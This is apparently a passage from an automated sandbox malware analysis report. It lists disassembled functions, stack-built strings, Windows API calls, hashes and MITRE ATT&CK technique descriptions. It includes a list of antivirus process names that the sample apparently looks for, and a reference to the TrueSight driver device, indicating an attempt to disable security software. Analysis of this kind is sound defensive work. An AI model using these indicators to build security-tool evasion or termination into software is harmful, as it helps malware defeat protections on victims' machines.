xe$baiduSafeTray.exe$cefutil.exe$knsdtray.exe$kscan.exe$ksetupwiz.exe$kwsprotect64.exe$kxemain.exe$kxescore.exe$kxetray.exe$mpcopyaccelerator.exe$mssecess.exe$remupd.exe$rtvscan.exe$vsserv.exe$wsctrl.exe$wsctrl10.exe$wsctrl11.exe$wsctrlsvc.exe
API String ID: 3215553584-2746239348
Opcode ID: 4e32be158a7c4e4477a21745abdf97e453c39b80d95e5fe94e298212bc1b91de
Instruction ID: 87a868f1ad31b17c07eb3913b625b3dd811f6acb485dec962ea0e68ccb90f7ff
Opcode Fuzzy Hash: 4e32be158a7c4e4477a21745abdf97e453c39b80d95e5fe94e298212bc1b91de
Instruction Fuzzy Hash: FBF1AD3A206F9099E761CF20E8947CA37B9F749358F904226DA9D47B64FF38C259C780

Function 00603BD5 Relevance: 87.6, APIs: 2, Strings: 48, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32 ref: 00603D10

Strings

t, xrefs: 00603C4A
u, xrefs: 00603C63
e, xrefs: 00603C6D
e, xrefs: 00603BE6
d, xrefs: 00603C0E
e, xrefs: 00603CB3
r, xrefs: 00603C54
k, xrefs: 00603BE1
3, xrefs: 00603BFF
t, xrefs: 00603CDB
s, xrefs: 00603C72
A, xrefs: 00603CEA
i, xrefs: 00603CA9
l, xrefs: 00603C3B
i, xrefs: 00603C59
A, xrefs: 00603C45
t, xrefs: 00603C4F
F, xrefs: 00603C31
A, xrefs: 00603CB8
b, xrefs: 00603CD1
e, xrefs: 00603C9A
i, xrefs: 00603CCC
u, xrefs: 00603CD6
n, xrefs: 00603BF0
e, xrefs: 00603BF5
t, xrefs: 00603CC2
l, xrefs: 00603C13
A, xrefs: 00603C77
e, xrefs: 00603CE0
r, xrefs: 00603BEB
l, xrefs: 00603BFA
G, xrefs: 00603C22
S, xrefs: 00603C95
F, xrefs: 00603CA4
t, xrefs: 00603CBD
t, xrefs: 00603C9F
t, xrefs: 00603C2C
i, xrefs: 00603C36
e, xrefs: 00603C27
s, xrefs: 00603CE5
r, xrefs: 00603CC7
., xrefs: 00603C09
e, xrefs: 00603C40
l, xrefs: 00603CAE
b, xrefs: 00603C5E
2, xrefs: 00603C04
l, xrefs: 00603C18
t, xrefs: 00603C68

Memory Dump Source

Source File: 00000006.00000002.3376421087.00000000005FD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fd000_4mPVjj.jbxd

Similarity

API ID: AttributesFile
String ID: .$2$3$A$A$A$A$F$F$G$S$b$b$d$e$e$e$e$e$e$e$e$i$i$i$i$k$l$l$l$l$l$n$r$r$r$s$s$t$t$t$t$t$t$t$t$u$u
API String ID: 3188754299-970789115
Opcode ID: 87bb6b810beafd5e56fe44c18cd7a01b0a1985ad6d6227ac30147871eff9ff27
Instruction ID: 97463889ca260df41336ee2b3476820aa67a00928fab71e13d354094c8edc043
Opcode Fuzzy Hash: 87bb6b810beafd5e56fe44c18cd7a01b0a1985ad6d6227ac30147871eff9ff27
Instruction Fuzzy Hash: 0951822050C7C0CDE352C628C44875BBFE26BA2749F48499DB2C98A3A2D7FF9558C727

Function 00600E25 Relevance: 57.8, APIs: 2, Strings: 31, Instructions: 98
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32 ref: 00600F86
WriteFile.KERNEL32 ref: 00600FBA

Strings

e, xrefs: 00600E54
t, xrefs: 00600E4F
a, xrefs: 00600E4A
r, xrefs: 00600E88
l, xrefs: 00600EBD
e, xrefs: 00600E97
C, xrefs: 00600EB5
e, xrefs: 00600E45
i, xrefs: 00600EA1
A, xrefs: 00600E73
F, xrefs: 00600E59
H, xrefs: 00600EDD
d, xrefs: 00600EF5
W, xrefs: 00600E83
o, xrefs: 00600EC5
l, xrefs: 00600EFD
t, xrefs: 00600E92
l, xrefs: 00600EA6
e, xrefs: 00600E6B
n, xrefs: 00600EED
e, xrefs: 00600F05
e, xrefs: 00600EAB
s, xrefs: 00600ECD
r, xrefs: 00600E40
F, xrefs: 00600E9C
i, xrefs: 00600E8D
C, xrefs: 00600E3B
i, xrefs: 00600E5E
l, xrefs: 00600E63
e, xrefs: 00600ED5
a, xrefs: 00600EE5

Memory Dump Source

Source File: 00000006.00000002.3376421087.00000000005FD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fd000_4mPVjj.jbxd

Similarity

API ID: File$CreateWrite
String ID: A$C$C$F$F$H$W$a$a$d$e$e$e$e$e$e$e$i$i$i$l$l$l$l$n$o$r$r$s$t$t
API String ID: 2263783195-3987612189
Opcode ID: 305012309f1f506a9ae185b57c22c1c419adf828ac335499a933d71724a0fa4a
Instruction ID: 1004f8aa3b1b1734aa812a4a9d8f609c8069a138785ea2b1bfaeb5e92eacc3a8
Opcode Fuzzy Hash: 305012309f1f506a9ae185b57c22c1c419adf828ac335499a933d71724a0fa4a
Instruction Fuzzy Hash: 4241CD3010C7C4CEE361DB28C44875BBFD1BBE2708F18495DA1D9862A2CBBA8558DB67

Function 005FE695 Relevance: 56.1, APIs: 1, Strings: 31, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 005FE778

Strings

3, xrefs: 005FE6B7
c, xrefs: 005FE725
e, xrefs: 005FE69E
G, xrefs: 005FE70C
p, xrefs: 005FE6EE
t, xrefs: 005FE716
n, xrefs: 005FE6A8
d, xrefs: 005FE6C6
S, xrefs: 005FE6DA
., xrefs: 005FE6C1
2, xrefs: 005FE6BC
e, xrefs: 005FE6E9
e, xrefs: 005FE711
k, xrefs: 005FE699
4, xrefs: 005FE74D
i, xrefs: 005FE720
n, xrefs: 005FE73E
6, xrefs: 005FE748
l, xrefs: 005FE6D0
k, xrefs: 005FE72A
l, xrefs: 005FE6DF
u, xrefs: 005FE739
r, xrefs: 005FE6A3
e, xrefs: 005FE6AD
C, xrefs: 005FE72F
T, xrefs: 005FE71B
o, xrefs: 005FE734
l, xrefs: 005FE6CB
l, xrefs: 005FE6B2
t, xrefs: 005FE743
e, xrefs: 005FE6E4

Memory Dump Source

Source File: 00000006.00000002.3376421087.00000000005FD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fd000_4mPVjj.jbxd

Similarity

API ID: Sleep
String ID: .$2$3$4$6$C$G$S$T$c$d$e$e$e$e$e$i$k$k$l$l$l$l$n$n$o$p$r$t$t$u
API String ID: 3472027048-1678096204
Opcode ID: f23281ce99727d82e4429899fda81e9298da085c9400dda77c106ed9c0d8467d
Instruction ID: 1dda6d21fc653ad3f60e5bb2919686dc128fab414b7090de04f97d775ccf9021
Opcode Fuzzy Hash: f23281ce99727d82e4429899fda81e9298da085c9400dda77c106ed9c0d8467d
Instruction Fuzzy Hash: 12419E2050CBC48AE702D768C44875FFFD2ABA6748F48099DB1C98A396C7FAC558C767

Function 005FE5A5 Relevance: 54.3, APIs: 1, Strings: 30, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32 ref: 005FE667

Strings

., xrefs: 005FE5D6
F, xrefs: 005FE5FE
t, xrefs: 005FE617
k, xrefs: 005FE5AE
r, xrefs: 005FE5B8
3, xrefs: 005FE5CC
u, xrefs: 005FE630
e, xrefs: 005FE5F4
r, xrefs: 005FE621
G, xrefs: 005FE5EF
e, xrefs: 005FE5C2
l, xrefs: 005FE608
i, xrefs: 005FE603
b, xrefs: 005FE62B
t, xrefs: 005FE5F9
l, xrefs: 005FE5E5
s, xrefs: 005FE63F
A, xrefs: 005FE644
A, xrefs: 005FE612
l, xrefs: 005FE5C7
d, xrefs: 005FE5DB
2, xrefs: 005FE5D1
e, xrefs: 005FE5B3
t, xrefs: 005FE61C
e, xrefs: 005FE63A
n, xrefs: 005FE5BD
i, xrefs: 005FE626
l, xrefs: 005FE5E0
e, xrefs: 005FE60D
t, xrefs: 005FE635

Memory Dump Source

Source File: 00000006.00000002.3376421087.00000000005FD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fd000_4mPVjj.jbxd

Similarity

API ID: AttributesFile
String ID: .$2$3$A$A$F$G$b$d$e$e$e$e$e$i$i$k$l$l$l$l$n$r$r$s$t$t$t$t$u
API String ID: 3188754299-2392786682
Opcode ID: 04168a18ef9139a812866acbdbe25316e2cb333e53e11c57863f81b89438e9d5
Instruction ID: 5826be081f591d497dc8abe66ba3c9279d434fc6bcb8377c8e66effb1f085dff
Opcode Fuzzy Hash: 04168a18ef9139a812866acbdbe25316e2cb333e53e11c57863f81b89438e9d5
Instruction Fuzzy Hash: 0F31732040C7C4D9E752D628848975FBEE16BA3748F88199DB2C44A292D7FF8558C727

Function 006002E5 Relevance: 33.4, APIs: 1, Strings: 18, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNEL32(?,-00000003,0060317F), ref: 006003C6

Part of subcall function 00603BD5: GetFileAttributesA.KERNEL32 ref: 00603D10

Strings

e, xrefs: 0060036D
a, xrefs: 00600363
r, xrefs: 00600359
b.qqqq\:v, xrefs: 006002FA, 00600327, 00600337
C, xrefs: 00600354
r, xrefs: 00600395
A, xrefs: 0060039F
c, xrefs: 00600386
t, xrefs: 0060038B
t, xrefs: 00600368
r, xrefs: 0060037C
D, xrefs: 00600372
y, xrefs: 0060039A
o, xrefs: 00600390
i, xrefs: 00600377
peelS, xrefs: 00600318, 00600346
e, xrefs: 0060035E
e, xrefs: 00600381

Memory Dump Source

Source File: 00000006.00000002.3376421087.00000000005FD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fd000_4mPVjj.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID: A$C$D$a$b.qqqq\:v$c$e$e$e$i$o$peelS$r$r$r$t$t$y
API String ID: 3401506121-3195934931
Opcode ID: 79a0a39577bae7287bb455bf0b90777d0d2de0e0be1f0a6853e8eddb745c8297
Instruction ID: 806ba5e3d1aede540b90254e66ef80447173f045792a13755a6eff33f6fee021
Opcode Fuzzy Hash: 79a0a39577bae7287bb455bf0b90777d0d2de0e0be1f0a6853e8eddb745c8297
Instruction Fuzzy Hash: 1441623100C7898BD705E718C444ADFBBD2FBE5304F040A6DB1CAC72A6DAB99648C796

Function 02911C01 Relevance: 5.2, Strings: 4, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D", xrefs: 02831E08
\\.\TrueSight, xrefs: 02831D6B
C:\Windows\System32\drivers\189atohci.sys, xrefs: 02831CF5, 02831D0E, 02831D21, 02831D3C, 02831D53
D", xrefs: 02831E55

Memory Dump Source

Source File: 00000006.00000002.3377253099.0000000002892000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000006.00000002.3377076364.0000000002830000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3377097034.0000000002831000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3377150150.0000000002854000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3377172422.0000000002856000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3377191741.0000000002858000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3377227045.000000000288C000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3377396175.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2830000_4mPVjj.jbxd

Similarity

API ID:
String ID: C:\Windows\System32\drivers\189atohci.sys$D"$D"$\\.\TrueSight
API String ID: 0-1670229900
Opcode ID: ca82bdffe969bb1f49eb6ca04908ebd6275caeacb4c55738742ad9b0098eb3fa
Instruction ID: 63af787c617f526fdce351b828e09de52d507bd4b0998f346c8dc5deda41468d
Opcode Fuzzy Hash: ca82bdffe969bb1f49eb6ca04908ebd6275caeacb4c55738742ad9b0098eb3fa
Instruction Fuzzy Hash: 6E61E67A215A8096EB21DF20E8543DE3365F7897A8F844212DF9D87BD8DF38C116CB41

Non-executed Functions

Function 00600475 Relevance: 131.6, Strings: 105, Instructions: 351
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

l, xrefs: 006005B3
n, xrefs: 006004B9
C, xrefs: 00600693
r, xrefs: 006004FF
e, xrefs: 006006E3
n, xrefs: 0060059B
n, xrefs: 006005F3
e, xrefs: 00600573
s, xrefs: 006007CF
n, xrefs: 0060065B
n, xrefs: 006005D3
A, xrefs: 0060081B
e, xrefs: 0060066B
n, xrefs: 0060054B
i, xrefs: 006004BE
c, xrefs: 006007BF
e, xrefs: 006006FD
n, xrefs: 0060067B
t, xrefs: 006004F5
n, xrefs: 0060052B
l, xrefs: 006006F8
I, xrefs: 006004EB
n, xrefs: 006004C3
s, xrefs: 006006AB
GAOrI, xrefs: 00600867
r, xrefs: 00600563
t, xrefs: 00600603
l, xrefs: 0060063B
t, xrefs: 0060057B
p, xrefs: 00600707
w, xrefs: 006004AF
I, xrefs: 006005CB
d, xrefs: 006004D7
o, xrefs: 006006A3
p, xrefs: 00600848
., xrefs: 006004D2
n, xrefs: 006006CB
F, xrefs: 0060062B
e, xrefs: 00600613
F, xrefs: 0060084D
d, xrefs: 006006D3
r, xrefs: 00600673
l, xrefs: 00600820
e, xrefs: 00600523
S, xrefs: 006006F3
e, xrefs: 00600702
A, xrefs: 006005BB
d, xrefs: 00600623
e, xrefs: 0060085C
t, xrefs: 00600663
o, xrefs: 006007B7
p, xrefs: 0060058B
e, xrefs: 00600683
H, xrefs: 006006BB
l, xrefs: 0060069B
a, xrefs: 00600811
i, xrefs: 00600633
t, xrefs: 00600553
p, xrefs: 0060051B
e, xrefs: 006007C7
t, xrefs: 006005DB
e, xrefs: 00600643
O, xrefs: 00600583
l, xrefs: 00600825
H, xrefs: 006007DF
e, xrefs: 0060080C
e, xrefs: 0060055B
H, xrefs: 00600807
p, xrefs: 006007F7
r, xrefs: 006005AB
e, xrefs: 006004C8
n, xrefs: 0060056B
o, xrefs: 0060082A
U, xrefs: 006005A3
t, xrefs: 006004CD
O, xrefs: 00600513
l, xrefs: 006004DC
t, xrefs: 0060068B
a, xrefs: 006006C3
n, xrefs: 00600504
t, xrefs: 0060050E
e, xrefs: 006007E7
e, xrefs: 006005E3
l, xrefs: 006006DB
p, xrefs: 00600816
c, xrefs: 0060082F
s, xrefs: 006007D7
n, xrefs: 006004F0
r, xrefs: 006005EB
HpS, xrefs: 0060089C
r, xrefs: 00600852
e, xrefs: 006005FB
A, xrefs: 00600533
i, xrefs: 006004B4
e, xrefs: 006004FA
a, xrefs: 006007EF
a, xrefs: 0060061B
R, xrefs: 0060060B
e, xrefs: 00600593
e, xrefs: 006006B3
I, xrefs: 00600653
e, xrefs: 00600857
I, xrefs: 00600543
l, xrefs: 006004E1
e, xrefs: 00600509

Memory Dump Source

Source File: 00000006.00000002.3376421087.00000000005FD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fd000_4mPVjj.jbxd

Similarity

API ID:
String ID: .$A$A$A$C$F$F$GAOrI$H$H$H$HpS$I$I$I$I$O$O$R$S$U$a$a$a$a$c$c$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$i$i$i$l$l$l$l$l$l$l$l$l$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$p$p$p$p$p$p$r$r$r$r$r$r$s$s$s$t$t$t$t$t$t$t$t$t$w
API String ID: 0-515521434
Opcode ID: c976aab0f775c25f95919249f3c08615063415f290fb3655b1620a153c3b787e
Instruction ID: bfad884af02d6251b45baa9e4efd39994b0aefe3284d6851684672e50799caca
Opcode Fuzzy Hash: c976aab0f775c25f95919249f3c08615063415f290fb3655b1620a153c3b787e
Instruction Fuzzy Hash: FA02B73010C7C4CEE776DB28C44879FBFD2ABA6709F04495DA1CD8A292CBBA5558C763

Function 00603EE5 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3376421087.00000000005FD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fd000_4mPVjj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb87282369c2248f9bec853ac7d1d5c57026666bbbbcfbeb5fe557e72dfe5db0
Instruction ID: 55998b0851d56a8add14146930e0bab5c949c5419961b3bc1fdf6b6b54d2943b
Opcode Fuzzy Hash: eb87282369c2248f9bec853ac7d1d5c57026666bbbbcfbeb5fe557e72dfe5db0
Instruction Fuzzy Hash: DBD0C724330E391DF75C051C1D6D37471C1E758983F90426ED505E16D1D845D5C14186

Function 005FD4EC Relevance: 110.5, APIs: 1, Strings: 62, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

e, xrefs: 005FD8AA
2, xrefs: 005FD80F
q, xrefs: 005FD8FB
p, xrefs: 005FD8B4
b, xrefs: 005FD914
q, xrefs: 005FD905
d, xrefs: 005FDAD9
e, xrefs: 005FD8AF
x, xrefs: 005FD891
g, xrefs: 005FD919
2, xrefs: 005FD846
r, xrefs: 005FD981
q, xrefs: 005FD900
d, xrefs: 005FD9D1
v, xrefs: 005FD8EC
l, xrefs: 005FD823
3, xrefs: 005FD80A
\, xrefs: 005FD8F6
S, xrefs: 005FD8A0
t, xrefs: 005FD999
e, xrefs: 005FD882
e, xrefs: 005FD9C1
B, xrefs: 005FD887
l, xrefs: 005FD81E
b, xrefs: 005FD91E
l, xrefs: 005FD8A5
T, xrefs: 005FD9A9
d, xrefs: 005FD850
e, xrefs: 005FD837
., xrefs: 005FD90F
a, xrefs: 005FD9C9
l, xrefs: 005FD85A
r, xrefs: 005FD83C
e, xrefs: 005FD869
M, xrefs: 005FD864
., xrefs: 005FD814
e, xrefs: 005FD7F1
s, xrefs: 005FD873
s, xrefs: 005FD86E
d, xrefs: 005FD819
l, xrefs: 005FD855
e, xrefs: 005FD9A1
a, xrefs: 005FD991
:, xrefs: 005FD8F1
o, xrefs: 005FD88C
l, xrefs: 005FD805
A, xrefs: 005FD896
a, xrefs: 005FD878
., xrefs: 005FD84B
g, xrefs: 005FD87D
e, xrefs: 005FD800
r, xrefs: 005FD9B9
e, xrefs: 005FD989
3, xrefs: 005FD841
k, xrefs: 005FD7EC
s, xrefs: 005FD832
q, xrefs: 005FD90A
r, xrefs: 005FD7F6
C, xrefs: 005FD979
n, xrefs: 005FD7FB
u, xrefs: 005FD82D
h, xrefs: 005FD9B1

Memory Dump Source

Source File: 00000006.00000002.3376421087.00000000005FD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fd000_4mPVjj.jbxd

Similarity

API ID: AttributesFile
String ID: .$.$.$2$2$3$3$:$A$B$C$M$S$T$\$a$a$a$b$b$d$d$d$d$e$e$e$e$e$e$e$e$e$e$g$g$h$k$l$l$l$l$l$l$n$o$p$q$q$q$q$r$r$r$r$s$s$s$t$u$v$x
API String ID: 3188754299-41237169
Opcode ID: b793aefed15908962f1150727c5829a81efd17c6f3cf6b858d036b256ee2bed5
Instruction ID: 2087262c63eaa13397943eda0350ce5b5eb0032bafc11a10b3d43a23bfa4e57d
Opcode Fuzzy Hash: b793aefed15908962f1150727c5829a81efd17c6f3cf6b858d036b256ee2bed5
Instruction Fuzzy Hash: 73A10D3010C7C5CAE362D738C44976FBEE27BA2348F54495DA2C986296CBBE9548C737

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

